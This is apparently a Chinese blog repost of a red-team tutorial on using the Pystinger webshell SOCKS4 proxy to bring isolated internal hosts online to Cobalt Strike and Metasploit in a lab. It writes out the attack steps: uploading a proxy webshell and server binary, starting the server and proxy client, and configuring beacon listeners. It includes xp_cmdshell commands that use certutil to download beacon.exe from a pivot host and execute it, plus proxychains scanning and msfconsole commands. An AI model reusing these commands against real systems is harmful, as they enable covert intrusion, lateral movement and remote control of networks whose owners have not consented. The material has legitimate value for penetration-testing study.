(毒刺)利用Pystinger Socks4上线不出网主机

已于 2022-08-11 14:50:08 修改
阅读量1k 收藏 1
点赞数 1
分类专栏: 内网 文章标签: java servlet 服务器
于 2022-07-01 20:24:15 首次发布
原文链接:https://mp.weixin.qq.com/s/cpN91KpBvTHwqqFHAQZDOw
版权

(毒刺)利用Pystinger Socks4上线不出网主机

原文链接:https://mp.weixin.qq.com/s/cpN91KpBvTHwqqFHAQZDOw
可参考:http://caidaome.com/?post=279

我们接着前两篇文章继续分享一篇利用Pystinger Socks4代理方式上线不出网主机的姿势,包括单主机和内网多台主机的两种常见场景!!!

项目地址:https://github.com/FunnyWolf/pystinger

**相关阅读:

**

1、利用MSF上线断网主机的思路分享

2、利用goproxy http上线不出网主机

0x01 测试环境

攻击机(Kali):192.168.56.101受害机1(Web):192.168.56.102、192.168.186.3 - 双网卡受害机2(Data):192.168.186.4 - 断网机

0x02 Pystinger简单介绍

Pystinger由服务端webshellstinger_server和客户端stinger_client两部分组成,可通过webshell实现内网SOCK4代理及端口映射,支持php/jsp(x)/aspx三种代理脚本。

图片

webshell只负责流量转发,大部分建立连接及处理数据的工作由stinger_server完成,stinger_client则用于接收转发过来的流量数据以及与CS/MSF的listener建立TCP连接等。

大致原理如下图,更为详细的原理分析可阅读“奇安信安全服务”公众号中的“红队攻防实践:不出网主机搭建内网隧道新思路”一文进行学习了解。

图片

0x03 Pystinger上线不出网主机

我们先将Pystinger项目的服务端stinger_server.exe、proxy.aspx通过中国菜刀上传至目标磁盘可读写目录中,访问proxy.aspx返回UTF-8表示正常,接着执行以下命令启动服务端。

start C:\inetpub\wwwroot\stinger_server.exe 0.0.0.0

图片

**注:**作者提示不要直接运行D:/XXX/stinger_server.exe,因为这样可能会导致TCP断连。

将客户端stinger_client上传至Kali攻击机的tmp临时目录,然后再执行以下命令将Socks4的代理流量转发到我们Kali攻击机60000端口上,只要把-w参数替换为自己上传的代理脚本地址即可。

root@kali:/tmp# chmod 777 stinger_clientroot@kali:/tmp# ./stinger_client -w http://192.168.56.102/proxy.aspx -l 127.0.0.1 -p 60000

图片

场景1:单主机上线

已控主机为单主机,不出外网且仅允许访问目标Web的80端口。如遇这种场景时可在执行完以上操作后在CobaltStrike创建一个Listener,HTTP Hosts填127.0.0.1,HTTP Port填60020

图片

场景2:多主机上线

已控主机为内网其中一台主机,双网卡(192.168.56.X为出网段,192.168.186.X为不出网段),在对不出网段中的其他内网主机进行横向移动上线时可在执行完以上操作后在CobaltStrike创建一个Listener,HTTP Hosts填192.168.186.3,HTTP Port填60020

图片

配置好监听后生成一个可执行马儿,将该文件放至192.168.186.3的Web服务器中供192.168.186.4断网数据库服务器下载,再利用xp_cmdshell组件执行beacon.exe后即可成功上线,Pystinger客户端那边也收到了相关连接数据。

EXEC master..xp_cmdshell 'certutil -urlcache -split -f http://192.168.186.3/beacon.exe C:\ProgramData\beacon.exe'EXEC master..xp_cmdshell 'C:\ProgramData\beacon.exe'

图片

图片

CobaltStrike监听设置

  • 单主机上线:CobaltStrike->Listeners->Add->127.0.0.1:60020

  • 多主机上线:CobaltStrike->Listeners->Add->192.168.186.3:60020

  • **注:**目标主机为双网卡时必须用不出网IP段的内网IP地址进行监听才能上线不出网主机;

上线至MSF的利用姿势

Kali攻击机上编辑/etc/proxychains.conf文件,底部添加一条socks4代理:127.0.0.1:60000,添加完成后先执行以下几条命令来验证下是否已经与不出网IP段通了?

root@kali:~# proxychains telnet 192.168.186.4 1433root@kali:~# proxychains curl http://192.168.186.4root@kali:~# proxychains nmap -sT -Pn 192.168.186.4[...SNIP...]

如果通了就再用proxychains来启动msfconsole,用不出网IP段的内网IP地址进行监听即可。原理大家都懂,就不实操截图了…。

root@kali:~# proxychains msfconsole -q[...SNIP...]
明月清风~~
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Cobal_Strike踩坑记录-DNS Beacon1
08-03
Cobal_Strike踩坑记录-DNS Beacon1
【工具使用】Pystinger(毒刺)的使用
做自己喜欢的事,并将其发挥到极致!
03-09 1329
文章目录Pystinger介绍项目地址Pystinger 原理图实现主机上线CS服务端配置客户端配置 Pystinger介绍 一款用于Webshell实现内 socks4 代理、端口映射的工具,可直接用于CobaltStrike / Metasploit上线,该工具使用python语言编写,目前支持的语言有 php, jsp(x) 和 aspx 三种脚本语言。 项目地址 https://github.com/FunnyWolf/pystinger https://gitee.com/zhanghk66
安全:Socks 代理 -- 本地代理 技术.
dzqxwzoe的博客
03-08 843
代理又称全能代理,就像有很多跳线的转接板,它只是简单地将一端的系统连接到另外一端。支持多种协议,包括http、ftp请求及其它类型的请求。和socks 5两种类型,socks 4只支持TCP协议而socks 5支持TCP/UDP协议,还支持各种身份验证机制等协议。其标准端口为1080.本地代理:( MSF 跳板多个内主机系列)两个内通讯上线( Frp 自建跳板 )内安全:Socks 代理 技术.两个内通讯上线( Ngrok )(4)进行监听:(kali)(3)进行监听:(kali)
SOCKET自动被关闭是什么原因
cl52155的专栏
10-28 5619
<br />我写了一个服务器程序。同事写了一个下位机。但他用两台下位机去连接我时前面的一台会被关闭。<br />问题是出现在下位机。他写了一个线程当按F2时执行<br />我感觉他这样写有问题SOCKET是全局的会不会下一台机器建立了一个相同的SOCKET所以前面的就就掉了<br />喜欢c和c++,或者汇编,或者喜欢windows sdk,或者喜欢算法的 朋友  <br />并且最后一点,也是最重要的一点:有良好的 言行的 家伙<br />32*32点阵是个学问,我深的画icon精髓,有没有伯乐给我推荐一
站被挂马植入webshell导致站瘫痪案例
tigerman20201的博客
01-25 800
一、问题现象 下午两点,刚刚睡醒,就接到了客户打来的电话,说他们的站挂(这个用词很不准确,但是感觉到问题的严重性)了,询问是怎么发生的,之前做了什么操作,客户的回答是:什么都没做,突然就不行了!对于这样的回答,我早已习惯,因为要想从客户那里得到有用的咨询,基本上很难,因为客户不是专业人士,所以只能根据客户的描述,一步步去判断问题。 通过客户给出的这个提示,问题判断方向有如下几个方面: 1、站无法访问了,可能服务down了。也可能服务器宕机了。 2、站访问很慢,基本打不开,所以客户就认为宕机了,
渗透测试面试百题斩
weixin_62369433的博客
11-11 2239
帮助更多人顺利通过渗透测试面试
记一次Shiro实战(目标不出
一直在水些技术小文
04-29 1216
1. 在一次渗透测试项目中,检测出了目标系统存在shiro漏洞也可以进行远程命令执行,但是反弹不了shell,原因可能是目标服务器不出。所以我们得通过shiro漏洞进行写webshell。漏洞所在位置如下。工具还是使用Shiro550/721漏洞检测工具进行写入webshell,那有几个问题 工具下载地址:https://github.com/feihong-cs/ShiroExploit-Deprecated/releases/tag/v2.51 1.在工具的哪个地方上传木马 2.如何找上传的路径 3
Webshell不出方案之正向socks代理reGeorg+Proxifier使用
Websec
09-14 7556
1、首先你已经拥有了一个webshell,如下我拥有一个天蝎shell: 2、机器不出(无法ping百度)。 2、这个时候需要使用reGeorg将我们的流量正向代理出来。 reGeorg地址如下: https://github.com/sensepost/reGeorg 下载到本地。 具体详细操作使用为: 第一步:上传tunnel.(aspx/php/jsp/ashx)到你控制的服务器上(如何拥有一台已控取决于自己)。 第二步:上传成功后核对你的tunnel脚本成功使用,一般正
pystinger (毒刺)正向代理工具
weixin_66717977的博客
03-21 1337
pystinger毒刺是一款正向代理工具,通过webshell可以实现内 socks4代理和端口映射,并且也可以直接上线MSF和CS。
渗透测试-web到内的总结
qq_50643984的博客
04-08 6513
WEB渗透 sql注入 【存在数据库交互就存在注入,本质就是传参过滤不严格】 注入分类: 1.post,get,cookie,http头注入 2.布尔盲注,时间盲注,报错注入,堆叠注入(;),联合注入(union) 报错注入常用函数: 1.floor,extractvaule,updatexml,exp mysql读取函数:load_file(),into outfile , into dumpfile sql注入bypass 常规bypass思路 替换:空格可以用/**/,/*!*/,%20,%09,%0
不出主机的几种上线方式
mingyqf的博客
03-10 1244
原文链接:https://www.anquanke.com/post/id/254671#h2-7 不出主机的几种上线方式 作者:SD 分享到: 发布时间:2021-11-02 10:30:15 前言 拿到一台边缘机器后,内的机器很有可能大多数都不出,这时又想上线cs方便后续操作。本文就如何上线不出主机的方式进行了总结。 环境搭建 目标内机器 os:win server 2012 ip:192.168.57.137 边缘机器 os:win server 2012 ip1:19
支持Socks4和Socks5的高并发服务器程序
10-21
在Windows系统中运行的Socks4+Socks5服务器程序,从成熟项目中分离出来,能达到很高的性能和络吞吐量。CPU占用率很低,稳定无BUG,可长期运行。 可指定端口,支持自启动,实时显示速和流量,支持TCP协议。
socks4a:一个使用golang实现socks4a服务器的例子
07-08
袜子4a 一个使用golang实现socks4a服务器的例子。
http socks4代理服务器源码-易语言
06-12
基于 hp-socket 开发的代理服务器, 多...经局域和远程外测试,SOCKS4 代理很稳定,HTTP代理的 HTTPS连接稳定,HTTP连接不稳定,多次访问会出现访问错误的问题 (本地和局域测试不出来可能是存储访问数据的问题吧)
易语言-易语言http socks4 socks5 超级代理服务端
06-26
基于 hp-socket 开发的代理服务器, 多连接,速度非常的快可基于一个端口开放 HTTP 和 SOCKS4 和 SOCKS5 的代理协议 支持 HTTPS 连接HTTP 和 SOCKS4 比较简单 只是单纯的转发这次增加了 SOCKS5 协议SOCKS5 协议支持...
mybatisPlus使用MetaObjectHandler对字段进行更新
最新发布
m0_56356631的博客
04-23 834
都是符合我们的预期的。
string模拟实现(C++)
m0_73969414的博客
04-23 1854
c++中string的模拟实现,面试必会知识点
实现自定义注解、实现自定义幂等性注解
qq_44721738的博客
04-23 1101
添加 Spring AOP 依赖。创建自定义注解。创建一个新的 Java 注解类,通过@interface关键字来定义,并可以添加元注解以及属性。@Target(ElementType.METHOD) //表示作用于方法上@Retention(RetentionPolicy.RUNTIME) // 表示这个注解在运行时是可见的,这样 AOP 代理才能在运行时读取到这个注解编写 AOP 拦截(自定义注解)的逻辑代码。@Aspect@Component// 方法执行前的处理。
socks4a内扫描主机端口
10-27
Socks4a 是一种 SOCKS 协议的变种,它允许用户通过代理服务器访问内部络的主机和服务。在使用 Socks4a 进行内扫描主机端口时,我们可以按照以下步骤进行: 1. 首先,需要准备一台可以访问代理服务器主机,这...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值